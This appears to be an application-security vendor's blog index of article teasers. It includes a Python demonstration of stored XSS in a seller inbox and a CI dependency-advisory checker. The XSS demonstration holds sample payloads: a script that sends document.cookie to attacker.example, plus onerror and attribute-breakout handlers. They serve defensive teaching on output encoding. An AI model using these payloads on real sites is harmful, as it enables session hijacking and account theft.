Company Blog


SAST vs DAST – Why SAST?

Application security was an afterthought until a few years ago, but the sharp rise in cybercrime and malicious activity has forced organizations to pay attention to this crucial discipline. That realization has also triggered a broad discussion about the pros and cons of the various AppSec solutions on offer today.

Penetration (pen) testing, Interactive Application Security Testing (IAST) and Web Application Firewalls (WAF) are all widely used, but they typically complement the two most widely adopted testing approaches: Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST).

This article compares SAST and DAST on five parameters:

  • Software Development Life Cycle (SDLC) integration.
  • Continuous Integration / Continuous Deployment (CI/CD) implementation.
  • Vulnerability coverage and effectiveness.
  • Mitigation/remediation performance.
  • Return on Investment (ROI).

Is SAST (white-box testing) truly effective at detecting today's commonly found application-layer vulnerabilities? Or is DAST (black-box testing) the better option for organizations?


15 Vulnerable Sites To (Legally) Practice Your Hacking Skills

They say the best defense is a good offense – and it’s no different in the InfoSec world. Use these 15 deliberately vulnerable sites to practice your hacking skills so you can be the best defender you can – whether you’re a developer, security manager, auditor or pen-tester. Always remember: Practice makes perfect! What other sites have you used to practice on? Let us know below!


XSS: The Definitive Guide to Cross-Site Scripting Prevention

As old as web browsers themselves, cross-site scripting (XSS) has been an ongoing issue in the security world. Its consistent appearance on the OWASP Top 10 and in news reports of cross-site scripting attacks has kept it in the spotlight over the years. Yet after two decades it remains one of the most common attacks on web applications, with reports repeatedly putting over 70% of sites at risk.

So, what is cross-site scripting, and how do we change our habits as users, developers and security professionals so we can prevent these attacks once and for all?


All You Wanted To Know About Continuous Integration Security

Continuous Integration (CI) is an application development practice that is becoming more and more popular in large software development organizations. While it boosts productivity and code integrity, it introduces new technical challenges for the security process, which makes selecting the right security solution for the task all the more important.

Although CI was introduced in the early 2000s, IT organizations continued to opt for conventional sequential (waterfall-style) development for years. That also meant traditional security solutions, which were largely applied towards the end of the production process and at times only after the application had been released. The result was spikes in maintenance costs and resource requirements.

But times are changing. Research by Actuation Consulting found that 74% of organizations were using Agile and Continuous Integration / Continuous Delivery (CI/CD) methodologies in 2013. The trend continues to gain steam thanks to the productivity benefits, but Continuous Integration security remains challenging because of the limitations of traditional security solutions.


CISO Insights: How the CISO of San Diego Secures His City

This article is the first in a series of interviews with CISOs in various industries. Our goal is to share our conversations with Chief Information Security Officers about how they handle daily tasks as well as the bigger picture of innovating security practices around business operations.

Gary Hayslip is currently the Deputy Director and Chief Information Security Officer for the City of San Diego, a role he has held for the past two years. Before that, Gary spent over 25 years as an information security professional in the US Navy, working his way up to CISO.

We had the opportunity to interview Gary about the risks and rewards of securing a major city, as well as what he has learned over his many years in the industry, and we share the highlights below. You can also grab the full interview here, and be sure to follow Gary on Twitter!


The AliExpress XSS Hacking Explained

As you may have heard, it was recently reported that AliExpress, one of the world's largest online shopping websites, had substantial security shortcomings. As one of the people who discovered the cross-site scripting (XSS) vulnerability, I would like to discuss and elaborate on it in the following post.

A few months ago, I purchased some items from AliExpress. After the purchase, I sent a message to the seller to ask a question about the items. From my experience as an application security expert at AppSec Labs, I suspected that the feature might be vulnerable to a certain security flaw, so I started to investigate the issue locally, without harming the system or its users.

After a short investigation, I concluded that any buyer on the website can browse to any item and send a message to the seller using the vulnerable "Contact Now" feature. Any registered buyer could abuse this feature to send the seller a message containing a malicious payload.
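The mechanism behind both the XSS guide above and the "Contact Now" case is stored XSS: text supplied by one user (the buyer) is saved and later rendered, unencoded, into a page viewed by another user (the seller). The following is an added example, not code from the original post, from AliExpress or from AppSec Labs. It uses constructed messages and a made-up inbox template to show the vulnerable rendering beside the hardened one, and uses Python's own HTML parser as a stand-in for the browser to check which rendering still contains executable markup:

```python
import html
from html.parser import HTMLParser

# Constructed sample messages (not taken from any real site): what a seller's
# inbox might receive from a buyer through a "contact the seller" form.
CONSTRUCTED_MESSAGES = {
    # Payload in HTML text context: a <script> tag plus an <img> whose
    # onerror handler fires, hidden inside an ordinary-looking question.
    "body_context": {
        "buyer": "buyer123",
        "subject": 'Question about item <img src=x onerror="alert(1)">',
        "body": "Is this in stock? <script>new Image().src="
                "'https://attacker.example/c?'+document.cookie</script>",
    },
    # Payload in attribute context: the buyer name closes the quoted
    # data-buyer attribute and adds an event handler to the <tr>.
    "attribute_context": {
        "buyer": 'x" onmouseover="alert(2)',
        "subject": "Shipping",
        "body": "Is shipping included?",
    },
}

TEMPLATE_TAGS = {"tr", "td"}  # the only tags the inbox template itself emits


def render_row_vulnerable(msg):
    """Naive template: buyer-controlled strings are interpolated as-is.

    Whatever the buyer typed becomes markup when the seller's browser parses
    the inbox page, so script tags and on* handlers run in the seller's
    session. This is the stored XSS pattern, shown here as what NOT to do.
    """
    return (
        f'<tr data-buyer="{msg["buyer"]}">'
        f'<td>{msg["subject"]}</td><td>{msg["body"]}</td></tr>'
    )


def render_row_hardened(msg):
    """Same template with output encoding for the two contexts it uses.

    html.escape(quote=True) turns & < > " ' into character references, which
    is the right encoding for HTML text content and for quoted attribute
    values. It is NOT sufficient for data placed inside a <script> block, a
    URL, or an unquoted attribute; those contexts need their own encoders.
    """
    esc = lambda s: html.escape(s, quote=True)
    return (
        f'<tr data-buyer="{esc(msg["buyer"])}">'
        f'<td>{esc(msg["subject"])}</td><td>{esc(msg["body"])}</td></tr>'
    )


class _TagCollector(HTMLParser):
    """Records every start tag and every on* attribute the parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(
            (tag, name) for name, _ in attrs if name.startswith("on")
        )


def active_content(rendered_html):
    """Parses a rendered row roughly as a browser would.

    Returns (foreign_tags, event_handlers): start tags that are not part of
    the template, and every on* attribute found. Both are empty for a safe
    rendering; either being non-empty means buyer text became markup.
    """
    collector = _TagCollector()
    collector.feed(rendered_html)
    collector.close()
    foreign = [t for t in collector.tags if t not in TEMPLATE_TAGS]
    return foreign, collector.handlers


if __name__ == "__main__":
    for name, msg in CONSTRUCTED_MESSAGES.items():
        print(name, "vulnerable:", active_content(render_row_vulnerable(msg)))
        print(name, "hardened:  ", active_content(render_row_hardened(msg)))
```

The point of the second constructed message is that escaping only `<` and `>` would still leave the attribute-breakout vector open; the quote characters have to be encoded too, and the attribute has to be quoted in the template. Output encoding chosen per context, applied at render time rather than at input time, is the fix; input filtering of "dangerous" strings is not a substitute.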


AppSec 101: The Secure Software Development Life Cycle

Due to the growing demand for robust applications, the secure Software Development Life Cycle methodology is gaining momentum all over the world. Its effectiveness in combating vulnerabilities has made it mandatory in many organizations. The objective of this article is to introduce the reader to the basics of the secure Software Development Life Cycle (also known as sSDLC).

Before we cover the steps of development in the secure Software Development Life Cycle, it is important to understand why an SDLC is needed in the first place. I will then present an overview of the secure Software Development Life Cycle and why it is becoming so helpful in developing safe web and mobile applications.

This article is written with CISOs, project managers, program managers, architects and developers in mind who want to improve the security standards of the applications their organizations develop. It is intended as a starting point for people who want to integrate security into their existing software development processes. First we will walk through the phases of the SDLC, then we will look at why a secure SDLC matters.


Open Source vs. Commercial Tools: Static Code Analysis Showdown

It is the never-ending dilemma, the 'Coke or Pepsi' debate of the software and security world, and there is still no definitive answer.

As the application security market grows, so does the variety of tools available to organizations seeking to secure their applications. With both open source and commercial tools appearing, and solid options on either side, the question facing organizations around the world is no easier to answer: when selecting tools for source code analysis, should we choose open source or commercial?

A few months ago, we released The Ultimate List of Open Source Static Code Analysis (SCA) Tools and heard that many found it useful when deciding between the open source SCA options.

Now we are taking a look at the pros and cons of open source static code analysis tools versus commercial ones. Each has its own benefits and downsides, and there are worthy tools under both commercial and open source licenses. What it comes down to are the needs of the organization securing the apps it builds and releases.


3 Things to Know About Managing Open Source Components in Your App

Manage your software where it is created. It is in your continuous integration environment that the various pieces of code become software. While some of that code is proprietary, much of it (probably over 50%) consists of open source components, because your development teams use open source components to boost their productivity and build better products.

You most likely have your proprietary code thoroughly tested, QA'd and reviewed by static code analysis on a regular basis. But what about the open source components?

Open source components have a direct impact on the quality and security of your software or service. Security vulnerabilities in open source components are discovered from time to time, and while they are often fixed very quickly, you need to learn about them when they are disclosed and be able to apply the right measures, usually an upgrade to the fixed version, when necessary.
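Knowing about a disclosed vulnerability in a component you ship comes down to a check that can run in the CI pipeline: compare the pinned versions in the build's manifest against an advisory feed (in practice a source such as OSV or the NVD) and fail the build when an installed version falls inside an advisory's affected range. The following is an added example, not code from the original article or from any product; the manifest, package names and advisory identifiers are all constructed for illustration, and the version parser deliberately handles only dotted numeric versions:

```python
import sys
from typing import Dict, List, Tuple

# Constructed sample data: fictitious package names, versions and advisory IDs.
CONSTRUCTED_MANIFEST: Dict[str, str] = {
    "jsonparse": "2.1.0",
    "imagekit": "0.9.4",
    "httpclient": "4.5.2",
    "templater": "3.0.1",
}

CONSTRUCTED_ADVISORIES: List[dict] = [
    {"id": "EXAMPLE-0001", "package": "jsonparse",
     "affected": ">=2.0.0,<2.1.5", "fixed": "2.1.5"},
    {"id": "EXAMPLE-0002", "package": "imagekit",
     "affected": "<1.0.0", "fixed": "1.0.0"},
    # Installed 4.5.2 is below this range, so it must NOT be reported.
    {"id": "EXAMPLE-0003", "package": "httpclient",
     "affected": ">=4.6.0,<4.6.3", "fixed": "4.6.3"},
    # Package not in the manifest at all; must be ignored.
    {"id": "EXAMPLE-0004", "package": "leftover",
     "affected": "<0.2.0", "fixed": "0.2.0"},
]


def parse_version(v: str) -> Tuple[int, ...]:
    """Parses a dotted numeric version into a comparable tuple.

    Pre-release and build suffixes ('1.0.0-rc1', '2.0.0+build.7') are out of
    scope for this example and are rejected rather than silently miscompared.
    """
    parts = v.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unsupported version string: {v!r}")
    return tuple(int(p) for p in parts)


_OPS = {
    ">=": lambda a, b: a >= b,
    "<=": lambda a, b: a <= b,
    "==": lambda a, b: a == b,
    ">": lambda a, b: a > b,
    "<": lambda a, b: a < b,
}


def satisfies(version: str, spec: str) -> bool:
    """True if `version` lies inside a range spec like '>=2.0.0,<2.1.5'.

    Clauses are comma-separated and ANDed together. Two-character operators
    are matched before one-character ones so '>=' is not read as '>'.
    """
    v = parse_version(version)
    for clause in spec.split(","):
        clause = clause.strip()
        for op in (">=", "<=", "==", ">", "<"):
            if clause.startswith(op):
                if not _OPS[op](v, parse_version(clause[len(op):])):
                    return False
                break
        else:
            raise ValueError(f"unsupported range clause: {clause!r}")
    return True


def check_manifest(manifest: Dict[str, str], advisories: List[dict]) -> List[dict]:
    """Returns one finding per advisory whose affected range contains the
    installed version of a package in the manifest, sorted by package name.
    Each finding carries the version to upgrade to, so the report is
    actionable rather than just a list of IDs.
    """
    findings = []
    for adv in advisories:
        installed = manifest.get(adv["package"])
        if installed is None:
            continue  # component not shipped in this build
        if satisfies(installed, adv["affected"]):
            findings.append({
                "package": adv["package"],
                "installed": installed,
                "advisory": adv["id"],
                "upgrade_to": adv["fixed"],
            })
    return sorted(findings, key=lambda f: f["package"])


if __name__ == "__main__":
    # CI gate: print the findings and fail the build if there are any.
    results = check_manifest(CONSTRUCTED_MANIFEST, CONSTRUCTED_ADVISORIES)
    for f in results:
        print(f'{f["package"]} {f["installed"]}: {f["advisory"]}, upgrade to {f["upgrade_to"]}')
    sys.exit(1 if results else 0)
```

The same check has to run again whenever the advisory feed changes, not only when the manifest changes, because the component you pinned months ago can become vulnerable on the day a new advisory is published.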


16 CISOs and Security Leaders You Should be Following on Twitter

A few months ago we published an article, '21 AppSec & Security Gurus You Should Be Following on Twitter', and even we were surprised by the buzz it created. It seems we struck a chord with our readers, who are apparently eager for new security people to follow on Twitter. So, to feed your hunger for 'security twits', we decided to double down and compile a list of the best tweeters of security news and insight among the people heading security organizations: the CISOs and CSOs.

These security leaders have had years of experience both securing and leading, and have great insights, advice, and news to share with their followers. We’ve even created a handy Twitter list for you to follow and easily keep up with the CISOs recognized here.

What other CISOs and CSOs are great to follow? Leave your suggestions below and we’ll add them to our list on Twitter!
